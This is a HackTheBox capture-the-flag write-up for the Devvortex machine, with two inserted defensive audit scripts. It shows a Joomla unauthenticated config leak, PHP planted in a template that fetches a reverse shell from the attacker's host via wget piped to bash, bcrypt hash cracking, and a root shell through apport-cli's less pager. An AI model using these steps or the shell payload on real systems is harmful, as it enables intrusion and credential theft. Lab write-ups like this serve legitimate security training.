HackTheBox - Devvortex

✍️ sckull

In Devvortex we start by exploiting a vulnerability in Joomla that gives us Administrator access and, after modifying a template, lets us run a reverse shell. Inside, we enumerate the database and find credentials for a second user. Finally we escalate privileges by spawning a shell from apport's pager.

Name: Devvortex
OS: Linux
Points: 20
Difficulty: Easy
IP: 10.10.11.242
Maker: 7u9y

Matrix (radar chart): User Rate - Enumeration 5.8, Real-Life 5.4, CVE 6.3, Custom Exploitation 3.7, CTF-Like 4.6; Maker Rate - not yet rated (all 0).

Recon

nmap

nmap shows the open ports: http (80) and ssh (22).

# Nmap 7.94SVN scan initiated Sat Nov 25 16:29:16 2023 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.129.222.153
Nmap scan report for 10.129.222.153
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 25 16:29:25 2023 -- 1 IP address (1 host up) scanned in 9.51 seconds

Web Site

The website redirects us to the domain devvortex.htb, which we add to /etc/hosts.

 π ~/htb/devvortex ❯ curl -sI 10.129.222.153
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 25 Nov 2023 21:30:25 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://devvortex.htb/

 π ~/htb/devvortex ❯

The site shows multiple links and appears to be a static site.

Directory Brute Forcing

feroxbuster lists the site's files and resources.

 π ~/htb/devvortex ❯ feroxbuster -u http://devvortex.htb/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://devvortex.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       12w      178c http://devvortex.htb/images => http://devvortex.htb/images/
301      GET        7l       12w      178c http://devvortex.htb/css => http://devvortex.htb/css/
301      GET        7l       12w      178c http://devvortex.htb/js => http://devvortex.htb/js/
200      GET        3l       10w      667c http://devvortex.htb/images/telephone-white.png
200      GET       11l       50w     2892c http://devvortex.htb/images/d-1.png
200      GET       44l      290w    17183c http://devvortex.htb/images/c-1.png
200      GET        5l       55w     1797c http://devvortex.htb/images/linkedin.png
200      GET      100l      178w     1904c http://devvortex.htb/css/responsive.css
200      GET      254l      520w     7603c http://devvortex.htb/do.html
200      GET      231l      545w     7388c http://devvortex.htb/about.html
200      GET      229l      475w     6845c http://devvortex.htb/portfolio.html
200      GET        7l       30w     2018c http://devvortex.htb/images/d-3.png
200      GET        5l       12w      847c http://devvortex.htb/images/envelope-white.png
200      GET        5l       23w     1217c http://devvortex.htb/images/location-white.png
200      GET        6l       13w      639c http://devvortex.htb/images/quote.png
200      GET       11l       39w     3419c http://devvortex.htb/images/d-4.png
200      GET      714l     1381w    13685c http://devvortex.htb/css/style.css
200      GET       87l      363w    24853c http://devvortex.htb/images/c-3.png
200      GET        6l       57w     1878c http://devvortex.htb/images/youtube.png
200      GET        6l       52w     1968c http://devvortex.htb/images/twitter.png
200      GET        5l       48w     1493c http://devvortex.htb/images/fb.png
200      GET        2l     1276w    88145c http://devvortex.htb/js/jquery-3.4.1.min.js
200      GET        9l       24w     2405c http://devvortex.htb/images/d-2.png
200      GET      348l     2369w   178082c http://devvortex.htb/images/map-img.png
200      GET      536l     2364w   201645c http://devvortex.htb/images/who-img.jpg
200      GET      536l     3109w   243112c http://devvortex.htb/images/w-3.png
200      GET       71l      350w    24351c http://devvortex.htb/images/c-2.png
200      GET      289l      573w     8884c http://devvortex.htb/contact.html
200      GET      583l     1274w    18048c http://devvortex.htb/index.html
200      GET     4440l    10999w   131868c http://devvortex.htb/js/bootstrap.js
200      GET      512l     2892w   241721c http://devvortex.htb/images/w-4.png
200      GET    10038l    19587w   192348c http://devvortex.htb/css/bootstrap.css
200      GET      636l     3934w   306731c http://devvortex.htb/images/w-2.png
200      GET      675l     4019w   330600c http://devvortex.htb/images/w-1.png
200      GET      583l     1274w    18048c http://devvortex.htb/

Subdomain Discovery

Running ffuf reveals the dev subdomain.

 π ~/htb/devvortex ❯ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 95ms]
:: Progress: [100000/100000] :: Job [1/1] :: 564 req/sec :: Duration: [0:02:58] :: Errors: 0 ::
 π ~/htb/devvortex ❯

Joomla

The subdomain hosts a different site, which appears to belong to a web development company.

Wappalyzer shows several technologies used by the site.

We try to trigger an error to confirm which technology runs the backend. The favicon belongs to Joomla, and Wappalyzer also reports the Joomla CMS.

We identify the version as Joomla 4.2.6.

 π ~/htb/devvortex ❯ curl -s http://dev.devvortex.htb/administrator/manifests/files/joomla.xml | grep version
<?xml version="1.0" encoding="UTF-8"?>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<version>4.2.6</version>
 π ~/htb/devvortex ❯

Joomla - CVE-2023-23752

Searching for vulnerabilities/exploits, we find one that affects this version.

According to the code of Joomla! v4.2.8 - Unauthenticated information disclosure, it makes two requests to two API endpoints: one for the users and one for the configuration.

http://dev.devvortex.htb/api/index.php/v1/users?public=true
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

Looking at the users, only two are listed: lewis and logan. The first is a Super User and the second is Registered.

 π ~/htb/devvortex ❯ curl -s "http://dev.devvortex.htb/api/index.php/v1/users?public=true" | jq
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/users?public=true"
  },
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2024-02-10 00:03:24",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
    {
      "type": "users",
      "id": "650",
      "attributes": {
        "id": 650,
        "name": "logan paul",
        "username": "logan",
        "email": "logan@devvortex.htb",
        "block": 0,
        "sendEmail": 0,
        "registerDate": "2023-09-26 19:15:42",
        "lastvisitDate": null,
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Registered"
      }
    }
  ],
  "meta": {
    "total-pages": 1
  }
}
 π ~/htb/devvortex ❯

Next comes the configuration, where the password P4ntherg0t1n5r3c0n## stands out.

 π ~/htb/devvortex ❯ curl -s "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
    "next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
    "last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
  },
  "data": [
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_message": "This site is down for maintenance.<br>Please check back again soon.",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "display_offline_message": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_image": "",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "sitename": "Development",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "editor": "tinymce",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "captcha": "0",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "list_limit": 20,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "access": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang_const": true,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbtype": "mysqli",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "host": "localhost",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "db": "joomla",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbprefix": "sd4fg_",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbencryption": 0,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbsslverifyservercert": false,
        "id": 224
      }
    }
  ],
  "meta": {
    "total-pages": 4
  }
}
 π ~/htb/devvortex ❯
users :
	- lewis
	- logan

password : P4ntherg0t1n5r3c0n##
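A defender-side check for the information disclosure above, added here as an example and not part of the original writeup: it merges the paginated JSON:API documents that /api/index.php/v1/config/application returns into one configuration map and lists which credentials and database details are reachable without authentication, so it can confirm that the endpoint stops leaking after patching. The sample pages, the function names and the `<constructed-sample>` values are constructed to mirror the output shown above.

```python
"""Check what Joomla's JSON API exposes unauthenticated (CVE-2023-23752).

Added example, not part of the original writeup. Each element of `data`
carries a single configuration key inside `attributes`, and the result is
paginated (meta.total-pages, links.next), so every page fetched is passed
in and merged before assessment.
"""
import json
import sys

SECRET_KEYS = {"password", "secret", "smtppass", "dbsslkey"}   # redact, then rotate
CONTEXT_KEYS = {"user", "host", "db", "dbprefix", "dbtype"}    # not secret, still useful to an attacker

# Constructed sample mirroring the shape of the page's output; the
# <constructed-sample> values stand in for the real secrets.
SAMPLE_PAGES = [
    {
        "data": [
            {"type": "application", "id": "224", "attributes": {"sitename": "Development", "id": 224}},
            {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
            {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
            {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
            {"type": "application", "id": "224", "attributes": {"password": "<constructed-sample>", "id": 224}},
            {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
        ],
        "meta": {"total-pages": 2},
    },
    {
        "data": [
            {"type": "application", "id": "224", "attributes": {"secret": "<constructed-sample>", "id": 224}},
            {"type": "application", "id": "224", "attributes": {"smtppass": "", "id": 224}},
        ],
        "meta": {"total-pages": 2},
    },
]


def flatten_config(pages):
    """Merge the one-key-per-element `attributes` of every page into one dict.

    A patched Joomla answers with an `errors` document and no `data`, which
    yields an empty dict here.
    """
    config = {}
    for page in pages:
        for element in page.get("data", []):
            if element.get("type") != "application":
                continue
            for key, value in element.get("attributes", {}).items():
                if key != "id":          # `id` is the repeated row id, not a setting
                    config[key] = value
    return config


def report_exposure(pages):
    """Return 'key: value' findings with secrets redacted; [] means nothing leaked."""
    config = flatten_config(pages)
    findings = []
    for key in sorted(config):
        value = config[key]
        if key in SECRET_KEYS and value not in ("", None):
            findings.append(f"{key}: <redacted>")
        elif key in CONTEXT_KEYS:
            findings.append(f"{key}: {value}")
    return findings


def decode_pages(raw_bodies):
    """Parse saved response bodies (e.g. curl output) into page dicts."""
    return [json.loads(body) for body in raw_bodies]


if __name__ == "__main__":
    # Pass saved JSON bodies as files, or run with no arguments to use the sample.
    if len(sys.argv) > 1:
        pages = decode_pages(open(path, encoding="utf-8").read() for path in sys.argv[1:])
    else:
        pages = SAMPLE_PAGES
    leaked = report_exposure(pages)
    print("\n".join(leaked) if leaked else "no sensitive configuration exposed")
```

Feed it the saved bodies of every page (follow links.next until meta.total-pages is reached); an empty result after the upgrade means the public filter no longer returns the database settings.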

Joomla - Access

We log in to the Joomla panel with the user lewis and that password.

User - www-data

We try to execute code in System -> Templates -> Site Templates -> Cassiopeia -> error.php.

We see the changes by triggering an error.

We edit the file again, this time adding the execution of a reverse shell generated with shells.

<?php

system('wget -qO- 10.10.14.47:8000/10.10.14.47:1335 | bash ');

We obtain access to the machine as www-data.

 π ~/htb/devvortex ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.47] from devvortex.htb [10.129.222.153] 49174
/bin/sh: 0: can't access tty; job control turned off
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/dev.devvortex.htb/templates/cassiopeia
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$

User - Logan

The configuration file contains the same configuration we accessed earlier through the API.

www-data@devvortex:~/dev.devvortex.htb$ cat configuration.php
<?php
class JConfig {
	public $offline = false;
	public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
	public $display_offline_message = 1;
	public $offline_image = '';
	public $sitename = 'Development';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = 20;
	public $access = 1;
	public $debug = false;
	public $debug_lang = false;
	public $debug_lang_const = true;
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'lewis';
	public $password = 'P4ntherg0t1n5r3c0n##';
	public $db = 'joomla';
	public $dbprefix = 'sd4fg_';
	public $dbencryption = 0;
	public $dbsslverifyservercert = false;
	public $dbsslkey = '';
	public $dbsslcert = '';
	public $dbsslca = '';
	public $dbsslcipher = '';
	public $force_ssl = 0;
	public $live_site = '';
	public $secret = 'ZI7zLTbaGKliS9gq';
	public $gzip = false;
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $offset = 'UTC';
	public $mailonline = true;
	public $mailer = 'mail';
	public $mailfrom = 'lewis@devvortex.htb';
	public $fromname = 'Development';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = false;
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = 25;
	public $caching = 0;
	public $cache_handler = 'file';
	public $cachetime = 15;
	public $cache_platformprefix = false;
	public $MetaDesc = '';
	public $MetaAuthor = true;
	public $MetaVersion = false;
	public $robots = '';
	public $sef = true;
	public $sef_rewrite = false;
	public $sef_suffix = false;
	public $unicodeslugs = false;
	public $feed_limit = 10;
	public $feed_email = 'none';
	public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
	public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
	public $lifetime = 15;
	public $session_handler = 'database';
	public $shared_session = false;
	public $session_metadata = true;
}www-data@devvortex:~/dev.devvortex.htb$

We see that MySQL port 3306 is open, listening on localhost.

www-data@devvortex:~/dev.devvortex.htb$ netstat -ntpl
netstat -ntpl
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      872/nginx: worker p
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      872/nginx: worker p
tcp6       0      0 :::22                   :::*                    LISTEN      -
www-data@devvortex:~/dev.devvortex.htb$

We connect to mysql with the known credentials. Listing the databases shows joomla.

www-data@devvortex:~$ mysql -D joomla -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 21805
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)

mysql>

Listing the tables shows the users table.

mysql> show tables;
show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| sd4fg_action_log_config       |
| sd4fg_action_logs             |
| sd4fg_action_logs_extensions  |
| sd4fg_action_logs_users       |
| sd4fg_assets                  |
| sd4fg_associations            |
[...]      |
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
| sd4fg_webauthn_credentials    |
| sd4fg_workflow_associations   |
| sd4fg_workflow_stages         |
| sd4fg_workflow_transitions    |
| sd4fg_workflows               |
+-------------------------------+
71 rows in set (0.00 sec)

mysql>

We see there are two password hashes.

mysql> describe sd4fg_users;
describe sd4fg_users;
+---------------+---------------+------+-----+---------+----------------+
| Field         | Type          | Null | Key | Default | Extra          |
+---------------+---------------+------+-----+---------+----------------+
| id            | int           | NO   | PRI | NULL    | auto_increment |
| name          | varchar(400)  | NO   | MUL |         |                |
| username      | varchar(150)  | NO   | UNI |         |                |
| email         | varchar(100)  | NO   | MUL |         |                |
| password      | varchar(100)  | NO   |     |         |                |
| block         | tinyint       | NO   | MUL | 0       |                |
| sendEmail     | tinyint       | YES  |     | 0       |                |
| registerDate  | datetime      | NO   |     | NULL    |                |
| lastvisitDate | datetime      | YES  |     | NULL    |                |
| activation    | varchar(100)  | NO   |     |         |                |
| params        | text          | NO   |     | NULL    |                |
| lastResetTime | datetime      | YES  |     | NULL    |                |
| resetCount    | int           | NO   |     | 0       |                |
| otpKey        | varchar(1000) | NO   |     |         |                |
| otep          | varchar(1000) | NO   |     |         |                |
| requireReset  | tinyint       | NO   |     | 0       |                |
| authProvider  | varchar(100)  | NO   |     |         |                |
+---------------+---------------+------+-----+---------+----------------+
17 rows in set (0.00 sec)

mysql> select name,username,email,password from sd4fg_users;
select name,username,email,password from sd4fg_users;
+------------+----------+---------------------+--------------------------------------------------------------+
| name       | username | email               | password                                                     |
+------------+----------+---------------------+--------------------------------------------------------------+
| lewis      | lewis    | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan paul | logan    | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+------------+----------+---------------------+--------------------------------------------------------------+
2 rows in set (0.01 sec)

mysql>

Cracking the Hash

We run john with the rockyou.txt wordlist against the hash file, and it finds a password.

 π ~/htb/devvortex ❯ john hash -wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (?)
1g 0:00:00:18 DONE (2023-11-25 17:17) 0.05461g/s 76.67p/s 76.67c/s 76.67C/s kelvin..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/devvortex ❯

Shell

We see that logan exists on the machine.

www-data@devvortex:~/dev.devvortex.htb$ cat /etc/passwd | grep home
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
logan:x:1000:1000:,,,:/home/logan:/bin/bash
www-data@devvortex:~/dev.devvortex.htb$

Using the password with this user, we get access and can read the user.txt flag.

www-data@devvortex:~$ su logan
Password: tequieromucho

logan@devvortex:/var/www$ whoami;id
logan
uid=1000(logan) gid=1000(logan) groups=1000(logan)
logan@devvortex:/var/www$ cd
logan@devvortex:~$ ls
user.txt
logan@devvortex:~$ cat user.txt
e816d767fa12e430a8e94d3741c367e6
logan@devvortex:~$

Privesc

We see that the user logan can run /usr/bin/apport-cli as root.

logan@devvortex:~$ sudo -l -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:

Sudoers entry:
    RunAsUsers: ALL
    RunAsGroups: ALL
    Commands:
	/usr/bin/apport-cli
logan@devvortex:~$

We look at the command's options and its version.

logan@devvortex:~$ sudo /usr/bin/apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]

Options:
  -h, --help            show this help message and exit
  -f, --file-bug        Start in bug filing mode. Requires --package and an
                        optional --pid, or just a --pid. If neither is given,
                        display a list of known symptoms. (Implied if a single
                        argument is given.)
  -w, --window          Click a window as a target for filing a problem
                        report.
  -u UPDATE_REPORT, --update-bug=UPDATE_REPORT
                        Start in bug updating mode. Can take an optional
                        --package.
  -s SYMPTOM, --symptom=SYMPTOM
                        File a bug report about a symptom. (Implied if symptom
                        name is given as only argument.)
  -p PACKAGE, --package=PACKAGE
                        Specify package name in --file-bug mode. This is
                        optional if a --pid is specified. (Implied if package
                        name is given as only argument.)
  -P PID, --pid=PID     Specify a running program in --file-bug mode. If this
                        is specified, the bug report will contain more
                        information.  (Implied if pid is given as only
                        argument.)
  --hanging             The provided pid is a hanging application.
  -c PATH, --crash-file=PATH
                        Report the crash from given .apport or .crash file
                        instead of the pending ones in /var/crash. (Implied if
                        file is given as only argument.)
  --save=PATH           In bug filing mode, save the collected information
                        into a file instead of reporting it. This file can
                        then be reported later on from a different machine.
  --tag=TAG             Add an extra tag to the report. Can be specified
                        multiple times.
  -v, --version         Print the Apport version number.
logan@devvortex:~$ sudo /usr/bin/apport-cli --version
2.20.11
logan@devvortex:~$

CVE-2023-1326

We find that privilege escalation is possible because apport uses less as its pager. To exploit the vulnerability a .crash file is needed; for that we refer to Managing Core Dumps and the “PoC”.

We trigger the creation of the .crash file.

logan@devvortex:/dev/shm$ sleep 500 &
[1] 16812
logan@devvortex:/dev/shm$ kill -s SIGTRAP $(pgrep sleep)
logan@devvortex:/dev/shm$
[1]+  Trace/breakpoint trap   (core dumped) sleep 500
logan@devvortex:/dev/shm$
logan@devvortex:/dev/shm$ ls -l /var/crash
total 32
-rw-r----- 1 logan logan 32277 Nov 25 22:26 _usr_bin_sleep.1000.crash
logan@devvortex:/dev/shm$

We run apport-cli on this file and see that the report is shown through less; from there we can use one of the GTFOBins (less) options to get a root shell and read our root.txt flag.

logan@devvortex:/dev/shm$ sudo apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
< apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (32.0 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v
v^J

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
............................................ [...] ...........................................

[...]

.........................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
................
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# whoami;id;pwd
root
uid=0(root) gid=0(root) groups=0(root)
/dev/shm
# cd /root
# ls
root.txt
# cat root.txt
a335b119a4544f839552343303277fb2
#
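An audit for the conditions the escalation above depends on, added here as an example and not part of the original writeup: it parses `sudo -l -l` long-format output for an apport-cli rule, compares the apport-cli version against the fixed release (I take 2.26.1 as the fix from the CVE-2023-1326 advisory, which lists 2.26.0 and earlier as affected), and checks whether kernel.core_pattern pipes core dumps to apport, which is what made the .crash file above appear. The sudo output, the core_pattern string and the function names are constructed to match what the page shows.

```python
"""Audit the preconditions of the apport-cli pager escalation (CVE-2023-1326).

Added example, not part of the original writeup. Three things had to hold
above: a sudo rule for /usr/bin/apport-cli, an apport-cli older than the
fixed release, and a core_pattern that hands crashes to apport so that a
.crash file can be produced. Each check is a plain function over text so
it can run against captured output as well as the live host.
"""
import re

# Upstream advisory for CVE-2023-1326 lists apport-cli 2.26.0 and earlier as affected.
FIXED_VERSION = (2, 26, 1)

# Constructed `sudo -l -l` output in the long format shown on the page.
SAMPLE_SUDO_L = """Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User logan may run the following commands on devvortex:

Sudoers entry:
    RunAsUsers: ALL
    RunAsGroups: ALL
    Commands:
        /usr/bin/apport-cli
"""
# Constructed to match Ubuntu's default apport hook.
SAMPLE_CORE_PATTERN = "|/usr/share/apport/apport %p %s %c %d %P %E"


def parse_version(text):
    """'2.20.11' -> (2, 20, 11); missing components are padded with 0."""
    nums = [int(n) for n in re.findall(r"\d+", text)][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def apport_cli_vulnerable(version_text):
    return parse_version(version_text) < FIXED_VERSION


def sudo_commands(sudo_l_output):
    """Collect command paths from every 'Commands:' section of `sudo -l -l`.

    In long format the commands follow 'Commands:' one per indented line,
    ending at a blank line or the next unindented entry.
    """
    commands, in_commands = [], False
    for line in sudo_l_output.splitlines():
        if line.strip() == "Commands:":
            in_commands = True
            continue
        if in_commands:
            if not line.strip() or not line[:1].isspace():
                in_commands = False
                continue
            commands.append(line.strip())
    return commands


def core_pattern_uses_apport(core_pattern):
    """True when core dumps are piped to apport (the '|' prefix means a handler)."""
    pattern = core_pattern.strip()
    return pattern.startswith("|") and "apport" in pattern


def audit(sudo_l_output, version_text, core_pattern):
    """Return a list of findings; all three together reproduce the page's scenario."""
    findings = []
    if any(cmd.endswith("apport-cli") for cmd in sudo_commands(sudo_l_output)):
        findings.append("sudo rule allows apport-cli")
    if apport_cli_vulnerable(version_text):
        findings.append(f"apport-cli {version_text.strip()} is older than 2.26.1")
    if core_pattern_uses_apport(core_pattern):
        findings.append("kernel.core_pattern pipes core dumps to apport")
    return findings


if __name__ == "__main__":
    # Sample run; on a live host read /proc/sys/kernel/core_pattern and
    # capture `sudo -l -l` and `apport-cli --version` into these arguments.
    for finding in audit(SAMPLE_SUDO_L, "2.20.11", SAMPLE_CORE_PATTERN):
        print(finding)
```

Removing the sudo rule or upgrading apport clears the first two findings; the third is Ubuntu's default and is only a problem in combination with them.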

Written by sckull (Dany Sucuc), RedTeamer & Pentester wannabe